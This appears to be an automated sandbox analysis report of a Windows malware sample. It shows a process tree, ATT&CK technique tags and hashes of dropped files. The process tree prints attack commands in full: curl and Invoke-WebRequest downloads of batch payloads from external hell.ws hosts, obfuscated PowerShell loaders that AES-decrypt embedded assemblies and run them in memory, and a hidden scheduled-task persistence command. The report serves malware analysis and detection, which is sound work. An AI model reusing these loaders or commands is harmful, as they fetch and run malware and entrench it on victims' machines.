    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2128,16776954870246304525,13916322134311266625,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5960 /prefetch:8
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:6056
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,16776954870246304525,13916322134311266625,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4520 /prefetch:1
    3⤵
    PID:6308
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,16776954870246304525,13916322134311266625,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6084 /prefetch:1
    3⤵
    PID:6316
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,16776954870246304525,13916322134311266625,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5616 /prefetch:1
    3⤵
    PID:6480
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,16776954870246304525,13916322134311266625,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5284 /prefetch:1
    3⤵
    PID:6584
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,16776954870246304525,13916322134311266625,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3740 /prefetch:1
    3⤵
    PID:6592
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,16776954870246304525,13916322134311266625,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4520 /prefetch:1
    3⤵
    PID:6780
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,16776954870246304525,13916322134311266625,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4172 /prefetch:1
    3⤵
    PID:6480
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,16776954870246304525,13916322134311266625,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3760 /prefetch:1
    3⤵
    PID:5428
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,16776954870246304525,13916322134311266625,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5272 /prefetch:1
    3⤵
    PID:844
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,16776954870246304525,13916322134311266625,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6208 /prefetch:1
    3⤵
    PID:1148
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,16776954870246304525,13916322134311266625,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6276 /prefetch:1
    3⤵
    PID:6232
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2128,16776954870246304525,13916322134311266625,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=4460 /prefetch:8
    3⤵
    PID:6788
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,16776954870246304525,13916322134311266625,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2852 /prefetch:1
    3⤵
    PID:6436
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,16776954870246304525,13916322134311266625,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4472 /prefetch:1
    3⤵
    PID:5812
- C:\Windows\system32\curl.exe
  curl -o "C:\Users\Admin\AppData\Local\Temp\fgg.bat" https://j.hell.ws/gt/fgg.bat
  2⤵
  PID:116

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5384

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5500

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:6384

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\btc.bat" "
1⤵
PID:6424
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\btc.pdf
  2⤵
  PID:6496
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x128,0x12c,0x130,0x104,0x134,0x7ffa4a9f46f8,0x7ffa4a9f4708,0x7ffa4a9f4718
    3⤵
    PID:6516

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\fgg.bat" "
1⤵
PID:4656
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo cls;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('0YWQzmqTKuorGZhyaVfaQGOQ/TaNZtYKg/M6fGnlY/s='); $aes_var.IV=[System.Convert]::FromBase64String('Fb/7VFSI4cX3zCRjbRORuw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $cJTCv=New-Object System.IO.MemoryStream(,$param_var); $FhvJg=New-Object System.IO.MemoryStream; $HiUim=New-Object System.IO.Compression.GZipStream($cJTCv, [IO.Compression.CompressionMode]::Decompress); $HiUim.CopyTo($FhvJg); $HiUim.Dispose(); $cJTCv.Dispose(); $FhvJg.Dispose(); $FhvJg.ToArray();}function execute_function($param_var,$param2_var){ $oaCWv=[System.Reflection.Assembly]::Load([byte[]]$param_var); $GVJwm=$oaCWv.EntryPoint; $GVJwm.Invoke($null, $param2_var);}$umNNN = 'C:\Users\Admin\Downloads\fgg.bat';$host.UI.RawUI.WindowTitle = $umNNN;$dxima=[System.IO.File]::ReadAllText($umNNN).Split([Environment]::NewLine);foreach ($jmcGU in $dxima) { if ($jmcGU.StartsWith('UVHVqMiOXKQOmGwKGzSD')) { $pjSCj=$jmcGU.Substring(20); break; }}$payloads_var=[string[]]$pjSCj.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));$payload3_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[2].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var $null;execute_function $payload3_var (,[string[]] ('')); "
  2⤵
  PID:3852
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2292
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\temp\mbkel3.cmd" "
    3⤵
    PID:1412
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo cls;cls;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('8SV/WDvVPPmlr1VeNSElCL9d/mvsiQAGuz9BIc/Gpq8='); $aes_var.IV=[System.Convert]::FromBase64String('Cz3JL+/UZIzRNVeROl9v5w=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ IEX '$HcHet=New-Object System.IO.M*em*or*yS*tr*ea*m(,$param_var);'.Replace('*', ''); IEX '$cVdbp=New-Object System.IO.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); IEX '$JIGxC=New-Object System.IO.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($HcHet, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $JIGxC.CopyTo($cVdbp); $JIGxC.Dispose(); $HcHet.Dispose(); $cVdbp.Dispose(); $cVdbp.ToArray();}function execute_function($param_var,$param2_var){ IEX '$rRxes=[System.R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$param_var);'.Replace('*', ''); IEX '$LMrgd=$rRxes.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); IEX '$LMrgd.*I*n*v*o*k*e*($null, $param2_var);'.Replace('*', '');}$LwPRG = 'C:\Users\Admin\AppData\Roaming\temp\mbkel3.cmd';$host.UI.RawUI.WindowTitle = $LwPRG;$rhjNV=[System.IO.File]::ReadAllText($LwPRG).Split([Environment]::NewLine);foreach ($EyCuI in $rhjNV) { if ($EyCuI.StartsWith('gxyeTzakauVreTHDhrRN')) { $bjFNN=$EyCuI.Substring(20); break; }}$payloads_var=[string[]]$bjFNN.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));$payload3_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[2].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var $null;execute_function $payload3_var (,[string[]] ('')); "
      4⤵
      PID:6400
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of SetWindowsHookEx
      PID:3468
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\Downloads\fgg')
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:5672
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$phantom-OneNotestartup_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\SCv2.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:5308

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\bt.bat" "
1⤵
PID:1988
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -windowstyle hidden -Command "Invoke-WebRequest -Uri 'https://cdn.hell.ws/gt/btc.bat' -OutFile 'C:\Users\Admin\AppData\Local\Temp\vrs.bat'"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:3856

C:\Windows\System32\NOTEPAD.EXE
"C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\Downloads\fgg.bat
1⤵
- Opens file in notepad (likely ransom note)
- Suspicious use of FindShellTrayWindow
PID:1132

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
3eb3833f769dd890afc295b977eab4b4

SHA1
e857649b037939602c72ad003e5d3698695f436f

SHA256
c485a6e2fd17c342fca60060f47d6a5655a65a412e35e001bb5bf88d96e6e485

SHA512
c24bbc8f278478d43756807b8c584d4e3fb2289db468bc92986a489f74a8da386a667a758360a397e77e018e363be8912ac260072fa3e31117ad0599ac749e72

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
cc10dc6ba36bad31b4268762731a6c81

SHA1
9694d2aa8b119d674c27a1cfcaaf14ade8704e63

SHA256
d0d1f405097849f8203095f0d591e113145b1ce99df0545770138d772df4997f

SHA512
0ed193fdcc3f625221293bfd6af3132a5ce7d87138cd7df5e4b89353c89e237c1ff81920a2b17b7e0047f2cc8b2a976f667c7f12b0dcc273ddc3b4c8323b1b56

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
467bc167b06cdf2998f79460b98fa8f6

SHA1
a66fc2b411b31cb853195013d4677f4a2e5b6d11

SHA256
3b19522cb9ce73332fa1c357c6138b97b928545d38d162733eba68c8c5e604bd

SHA512
0eb63e6cacbec78b434d976fa2fb6fb44b1f9bc31001857c9bcb68c041bb52df30fbc7e1353f81d336b8a716821876fcacf3b32a107b16cec217c3d5d9621286

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
39e172e21217c0371738d7559f70a391

SHA1
404e8c79fa39d993a8002dfafdd8fec7abf8f38a

SHA256
83599797c28630630d73ff04bcba53fca86475204af5dc4074f8336713452dd0

SHA512
16fe59d18d3c200dad9224d6701abcc8a5e53089be7301d18d9adc0763518194e0aff038f1f2d294d9ca32e51b0d949cebdc5c9fd0d0a5b943d1c98c4fabe5a6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Edge Profile.ico

Filesize
70KB

MD5
e5e3377341056643b0494b6842c0b544

SHA1
d53fd8e256ec9d5cef8ef5387872e544a2df9108

SHA256
e23040951e464b53b84b11c3466bbd4707a009018819f9ad2a79d1b0b309bc25

SHA512
83f09e48d009a5cf83fa9aa8f28187f7f4202c84e2d0d6e5806c468f4a24b2478b73077381d2a21c89aa64884df3c56e8dc94eb4ad2d6a8085ac2feb1e26c2ef

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache\data_1

Filesize
264KB

MD5
600314d8044adddcddc57c629c2f87f7

SHA1
2935d8b28912e2ff9e41963f5488fc272dcb4fcf

SHA256
79b9f9e0d951e3d2e5b925f930fd26984e9f087c139628057c0bc27bdf8fd197

SHA512
9aa16b4d62b91abafb75b769d31aad1b4b1a30dc211c2ab2357dc46913cb3aac8cf7cf8356e8870f3724a121a70d972aa1fdca9d2ddb08e04ce8444490769b9e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
440B

MD5
368e4d5df975bdf87fb29234a7240c28

SHA1
e04bd08e9ebff285216b1c0f598f0d8fc2707bbb

SHA256
9ab6faf32a56ba96c9e085b98ae81bc92a75ff7f3b0dff9da7996d5b8ee8a507

SHA512
63765d17a29914d3748eba922a62e9e2db39432ed776192965ff897fe3405a34be32435b63fb7062132708ce1a26f48d7495c7f84236f65a39ee97d2de9dcc7b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State~RFe5952d9.TMP

Filesize
59B

MD5
2800881c775077e1c4b6e06bf4676de4

SHA1
2873631068c8b3b9495638c865915be822442c8b

SHA256
226eec4486509917aa336afebd6ff65777b75b65f1fb06891d2a857a9421a974

SHA512
e342407ab65cc68f1b3fd706cd0a37680a0864ffd30a6539730180ede2cdcd732cc97ae0b9ef7db12da5c0f83e429df0840dbf7596aca859a0301665e517377b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
b205f6d2b380601f57717ef4d221cd96

SHA1
a9195570821d4abc702cb8d5619c0edcd0b17481

SHA256
352585e2d529ad6ea187c5b0b93e5ae0d62022eecc16b012d060dc4f073f9136

SHA512
1a3591dfab6984c44a84c0b13aee992ad8f96a97b37f4dd00fbe210afa1f4dd3c6b773ece94b55808a82529c52a45a1715eed7fd868e7f5b2be3836e6973b04d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
2e32d7e4681f93a00817d9a41feaf7fc

SHA1
dd15f69ad82219c59fee1f6b7b9e5352450769e7

SHA256
090ee029ee9f893ca78a9af72ceaab503b50781efa60c830c965f3645b50f42b

SHA512
957620c968457fc40eb99f4c13e05649cc146d0e4140f89d665bbc96e4ba95843d5b04141f7fab61fd7f6bae3b1bf3e20376ce09dd932a289c8c83a30ed04955

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
fc88ff635842cf89267ea73a939099a4

SHA1
fea7d45c05f11d4bd45374f0e5b71a67074154a6

SHA256
25f2cbfc9814c2489bb0a8a0ea4119a01aed4255359a3272206458e8e458b74d

SHA512
25be008ddc9bd1e243b90bf44ba44dd03ec96322ebd76bbe3aae1a77d11a8512299cf16187cecb38d263e2117db4b414834c31e0486420bea0c903043f3f4db2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
a1ee45bdfce38bd9be81c21c3a0914ec

SHA1
63baf8e118e9fc377a1126dc9e9504b695d66abc

SHA256
87494fc774513c5f99874d03bc04eea918057dc0473b924dae72a8e391752743

SHA512
96a3d86266a5048d4aec95bb137ffa20eebe99cd639302320c705b8928cf5f0c70748e3504df48c171b03b4e786f426d4a1aea6848bf2840b325c1d0f6886e19

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
4KB

MD5
43827c60b0576e3128491e378ab32f73

SHA1
52cab4d203230909881a9dd73af952e21a1e6af7

SHA256
3d52c61f7e8c53f130288f0c10068717b7d0a0277a37a4a88650d7a4f8cfd811

SHA512
cc497fa5a47e0e40646b20b4c343bb20930b87016ba317dea573d656d15726254a2340b682eb6779e260cea0ba2cb4c66a560e5a5e2dce7dfcb37c956e9527d7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
a787336433a38c1c1dc220e31dbaecec

SHA1
a5518e30d0628fa2abbb73e771928e41c18a8fdd

SHA256
660ef5ca29dea5c5d83e543cf8f388eca9229e537c0b5443b5858867acd01f75

SHA512
78e6d8ead862d768bc7331bc4ae8a3cf67a7a6ddb83fbff405e16473215dcd51e737b38121da2cd354d12bab245db6041bc3985bcfb3e6e0e6629d53ab622a65

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

Filesize
24KB

MD5
3b964859deef3a6f470b8021df49b34d

SHA1
62023dacf1e4019c9f204297c6be7e760f71a65d

SHA256
087debdcfba4666c03a5ea699e9bb31cf22ef4e0fad7c961cb0b500e5d262fb5

SHA512
c30b7e1b28820a5815b52634b46cb210c241704e33e41304400cb3ed29e82ec547a1068fc819350b368456bcabd27034afade5add3251dc74e4174f51b6c7adf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

Filesize
24KB

MD5
5c2d5c900312f44e72209416d45723cb

SHA1
68fb8909308589149399c3fb74605600833fbbc1

SHA256
56f7a77549e5fc45bd4b1f7c2db3e8b4bd1dd9234545207613a80342cee8e7d8

SHA512
07c2920cff7c1125e3a2fe66bf21d8606a1f2a3d36be2d8e136da0d2a21130242ac8324f18cedfb0040304cf804815861767c969a6923d8db851312bf9b4348b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
206702161f94c5cd39fadd03f4014d98

SHA1
bd8bfc144fb5326d21bd1531523d9fb50e1b600a

SHA256
1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

SHA512
0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\MANIFEST-000001

Filesize
41B

MD5
5af87dfd673ba2115e2fcf5cfdb727ab

SHA1
d5b5bbf396dc291274584ef71f444f420b6056f1

SHA256
f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4

SHA512
de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
1f863cc4d29d263c50aea3d2a58b021d

SHA1
144dcf851fe79a771bf7b8ece1afb0aec6cd9389

SHA256
da0cd03595f0f50fb664b4c44e28d523a55f60491bd302eee9e9b143735a80fa

SHA512
af6e7fcbebf6f2450380e804787108951da6d1dec23f4f6bb542d2e8d43403277d843253a3ff81bcbb1b5ed249226d2307b4929da5e521551528bfb03a9b3e2c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
7710f56818950702778b3d6304f02b13

SHA1
2259b26063c874e192b32ee72c7d1cb51a494e0a

SHA256
39222abf84e12c9ccf9a74f0904ab7898836ba34e4b307973ca84dcb9c1ccb7c

SHA512
83d8f482be6f75149be03a41e9c058612a6c6971a520d17a0a8e4e321a106ba50da84259ba502d9d55633b187903ffd7fd4fbf742b7bf2601c5b1057c016ab6a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
11a2c98c2eb40466ed4ef930efed3739

SHA1
451dd544d7f27698865b79424d7d1603f58324c9

SHA256
43ca3ce1c955c715a0a87ab34a1684cdd091e0e896bc1f1275800205bda40687

SHA512
1efdc0161922d5d6d7b38eaeb23a54d98cb24fd88e192ef0798efe92429ac1200045314c1941bac321f16e30df4b0ef98823e9bb20250dc6d5bd7643ac0cb234

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
8KB

MD5
90a8071f627641f472ee9405ffa6a8bc

SHA1
083bcf172f1b1633fbbf055bf058af1831ffd28f

SHA256
3b46416ecf146bf6385836876b817ef78b5a3c0636fb2dccc89f8985d2e083d8

SHA512
a6cb7ea88d7d1fca1552c5a8e8e8ffc76ff292b4b3ab50f59d24a63f71a4ab0ea663a2b321d69c5905e389062e3b15d673757c25a3784e3a2d4ec1901bccff42

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
54KB

MD5
2f7b8a2467120758d033dd57f155aef1

SHA1
ea013573e4b88c5877a468f61736086215e8e417

SHA256
24eaf54e2317aca4e1029b7955660abd05bfe0b9e0a80b3c09914efe0625bda7

SHA512
a77eb5be2e292476c9382976766649a2e4b6530893cc120e7b6f8b35ae4883f34ed3372445a73fa54ab08e2e94498b4116d83e6baf111d7ef775a1d3623f801c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
82c0ad495329f6c7377b038ffda15901

SHA1
9dd067fdffb127bd3943b58b1dc35b36f9e96883

SHA256
728723746fbe3636b1f641a84e22bf1d36791012620ea5df074fbedac26ddcb6

SHA512
17c6de0e32305f0bb1c3f50f896845d45341df457b3eafafe660d29ed54c94be812c069b877eef0f12b3fb2e2d26cde1b002e46840967205d58d01a695bbc51e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
68750ab2d270b0d5264a95a61bd0f62a

SHA1
90e9a7ebff36864092b32275618d92bd7b6fa6bf

SHA256
6cd35b5c48dfbaded7588df174d6c19d44b8e0835639b281ece1b62fcf81ecdb

SHA512
f27d526cb4696b29962ef77ef76401947a717983d7922383244f2c7ed86501b94657741ca424ba1a971b69aedb33151739ec5e713f0be003936ba1af9d8aebbf

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\7xr8dama.default-release\activity-stream.discovery_stream.json

Filesize
23KB

MD5
069a1c56c42a5d0d7af6b5e5d2ba9271

SHA1
1d0afcc5b0d116a10b65d271a870ea29faf36370

SHA256
818f65d9d6f91d2abf7c035ca14b1ca9edcdd7883c9bbc3d661ee01293f4f87f

